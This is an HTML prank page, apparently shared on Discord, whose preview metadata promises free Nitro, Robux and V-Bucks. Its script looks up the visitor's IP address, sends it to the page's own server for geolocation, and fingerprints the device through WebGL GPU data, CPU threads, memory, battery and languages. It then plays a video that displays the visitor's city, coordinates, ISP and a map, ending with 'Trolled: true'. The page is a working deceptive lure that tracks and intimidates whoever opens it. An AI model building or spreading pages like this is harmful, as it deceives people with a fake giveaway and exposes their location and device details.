<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>DEEM#6666</title>
<link rel="icon" type="image/png" href="https://cdn.discordapp.com/attachments/979158890899996735/982733750871949332/Trolling.png">
<meta name="theme-color" content="#2f3136">
<meta property="og:title" content="deem.is-very.dog">
<meta property="og:description" content="FREE NITRO, ROBUXS, V-BUCKS and more!">
<meta property="og:image" content="https://cdn.discordapp.com/attachments/979158890899996735/982733750871949332/Trolling.png">
<meta property="og:image:alt" content="DEEM">
<style>
        body {
            overflow: hidden;
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
            color: white;
            background-color: black;
        }

        .loading {
            position: absolute;
            margin-top: 20%;
            margin-left: auto;
            margin-right: auto;
            left: 0;
            right: 0;
            text-align: center;
            font-size: 4vh;
        }

        .start-btn {
            position: absolute;
            width: 40%;
            margin-top: 20%;
            margin-left: 30%;
            padding: 2vh;
            border-radius: 1vh;
            border-color: transparent;
            font-size: 3vh;
            font-weight: 700;
            cursor: pointer;
            z-index: 3;
        }

        .glowup-video {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
        }

        @media only screen and (min-aspect-ratio: 1 / 1) {
            .glowup-video {
                object-fit: cover;
            }
        }

        .text {
            height: 100vh;
            top: 0;
            position: absolute;
            margin-left: auto;
            margin-right: auto;
            left: 0;
            right: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            text-align: center;
            flex-direction: column;
        }

        .text,
        .text span {
            z-index: 1;
        }

        .text span {
            font-size: inherit;
        }

        .map-container {
            height: 100vh;
            top: 0;
            display: flex;
            position: absolute;
            margin-left: auto;
            margin-right: auto;
            left: 0;
            right: 0;
            justify-content: center;
            align-items: center;
            text-align: center;
            flex-direction: column;
            z-index: 2;
        }
    </style>
</head>
<body>
<h1 id="loading" class="loading">Loading Website...</h1>
<button id="start-btn" class="start-btn" style="visibility: hidden;">Click here to load the website</button>
<video id="glowup-video" class="glowup-video" style="visibility: hidden;">
<source src="/glowup.mp4" type="video/mp4" />
</video>
<div id="text" class="text"></div>
<div id="map-container" class="map-container" style="visibility: hidden;">
<img id="map">
</div>
<script>
        (async () => {
            try {
                const basicIpInfo = await (await fetch(`https://ipv4.wtfismyip.com/json`)).json();

                const ipInfo = await (await fetch(`${window.origin}/data?ip=${basicIpInfo.YourFuckingIPAddress}`)).json();
                if (ipInfo.status !== `success`) throw new Error(ipInfo.message);

                let webGL, webGLDebugInfo;
                const canvas = document.createElement(`canvas`);
                try {
                    webGL = canvas.getContext(`webgl`) ?? canvas.getContext(`experimental-webgl`);
                    webGLDebugInfo = webGL?.getExtension(`RENDERER`) ?? webGL?.getExtension(`WEBGL_debug_renderer_info`);
                } catch (error) { }

                const stage1Data = [
                    [`IP`, ipInfo.query],
                    [`ISP`, ipInfo.isp],
                    [`ORG`, ipInfo.org],
                    [`Proxy`, ipInfo.proxy],
                    [`Hosting`, ipInfo.hosting],
                    [`User Agent`, ipInfo.agent],
                    [`Cookies Enabled`, !!window.navigator?.cookieEnabled],
                ];

                const stage2Data = [
                    [`Continent`, ipInfo.continent ?? ipInfo.continentCode],
                    [`Country`, ipInfo.country ?? ipInfo.countryCode],
                    [`Region`, ipInfo.regionName ?? ipInfo.region],
                    [`City`, ipInfo.city],
                    [`Zip Code`, ipInfo.zip],
                    [`Lat`, ipInfo.lat],
                    [`Lon`, ipInfo.lon],
                    [`Timezone`, ipInfo.timezone],
                    [`Local Time`, new Date().toLocaleTimeString()],
                    [`Currency`, ipInfo.currency],
                    [`Language Headers`, ipInfo.acceptLang],
                    [`Enabled Languages`, window.navigator?.languages?.join(`, `) ?? `en-US`],
                    [`Autonomous System`, ipInfo.asname ?? ipInfo.as],
                    [`OS`, window.navigator?.oscpu ?? window.navigator?.platform ?? `<Unknown>`],
                    [`CPU Threads`, window.navigator?.hardwareConcurrency ?? 1],
                    [`Memory`, `${window.navigator?.deviceMemory ?? (performance.memory?.jsHeapSizeLimit ?? 0) / (1024 ** 3) ?? `<Unknown>`}Gb`],
                    [`Heap Size Limit`, `${(performance.memory?.jsHeapSizeLimit ?? 0) / 1024}Kb`],
                    [`GPU Vendor`, webGLDebugInfo ? webGL?.getParameter(webGLDebugInfo.UNMASKED_VENDOR_WEBGL) ?? `<Unknown>` : `<Unknown>`],
                    [`GPU Info`, webGLDebugInfo ? webGL?.getParameter(webGLDebugInfo.UNMASKED_RENDERER_WEBGL) ?? `<Unknown>` : `<Unknown>`],
                    [`Mobile`, ipInfo.mobile],
                    [`Touch Enabled`, window.navigator?.maxTouchPoints > 0],
                    [`Battery`, typeof window.navigator?.getBattery === `function` ? `${((await window.navigator.getBattery()).level ?? 1) * 100}%` : `Unavailable`],
                    [`Trolled`, `true`]
                ];

                const loading = document.getElementById(`loading`);
                const startBtn = document.getElementById(`start-btn`);
                const glowupVideo = document.getElementById(`glowup-video`);
                const text = document.getElementById(`text`);
                const mapContainer = document.getElementById(`map-container`);
                const map = document.getElementById(`map`);

                await new Promise((resolve) => {
                    map.onload = () => resolve();
                    map.src = ipInfo.map;
                });

                startBtn.addEventListener(`click`, async () => {
                    startBtn.style.visibility = `hidden`;
                    glowupVideo.style.visibility = `visible`;

                    glowupVideo.loop = true;
                    glowupVideo.play();

                    const STAGE_1_START = 3.8;
                    const STAGE_1_END = 8.2;
                    const STAGE_1_BEAT_MULT = 7;

                    const STAGE_2_START = 13.4;
                    const STAGE_2_END = 20.5;
                    const STAGE_2_BEAT_MULT = 11;

                    const SHOW_MAP = 22.8;

                    let lastBeat = {
                        stage: 0,
                        beat: 0
                    };

                    setInterval(() => {
                        let fontSize = Math.min(window.innerHeight / 30, window.innerWidth / 30);
                        text.style.fontSize = fontSize + `px`;

                        const time = glowupVideo.currentTime;

                        if (time > STAGE_1_START && time < STAGE_1_END) {
                            const beat = Math.ceil(((time - STAGE_1_START) / (STAGE_1_END - STAGE_1_START)) * STAGE_1_BEAT_MULT);

                            if (beat !== lastBeat.beat) {
                                text.style.visibility = `visible`;

                                const newText = document.createElement(`span`);
                                newText.textContent = stage1Data[beat - 1].join(`: `);
                                text.appendChild(newText);
                            }

                            lastBeat = {
                                stage: 1,
                                beat
                            }
                        } else if (time > STAGE_2_START && time < STAGE_2_END) {
                            const beat = Math.ceil(((time - STAGE_2_START) / (STAGE_2_END - STAGE_2_START)) * STAGE_2_BEAT_MULT);

                            if (beat !== lastBeat.beat) {
                                text.style.visibility = `visible`;

                                const newText = document.createElement(`span`);
                                newText.textContent = stage2Data[(beat * 2) - 1].join(`: `);
                                text.appendChild(newText);

                                const newText2 = document.createElement(`span`);
                                newText2.textContent = stage2Data[beat * 2].join(`: `);
                                text.appendChild(newText2);
                            }

                            lastBeat = {
                                stage: 2,
                                beat
                            }
                        } else if (time > SHOW_MAP) {
                            mapContainer.style.visibility = `visible`;
                        } else {
                            text.innerHTML = ``;
                            mapContainer.style.visibility = `hidden`;
                            text.style.visibility = `hidden`;
                            lastBeat = {
                                stage: 0,
                                beat: 0
                            }
                        }
                    }, 10);
                });

                loading.style.visibility = `hidden`;
                startBtn.style.visibility = `visible`;
            } catch (error) {
                console.error(error);
            }
        })();
    </script>
</body>
</html>
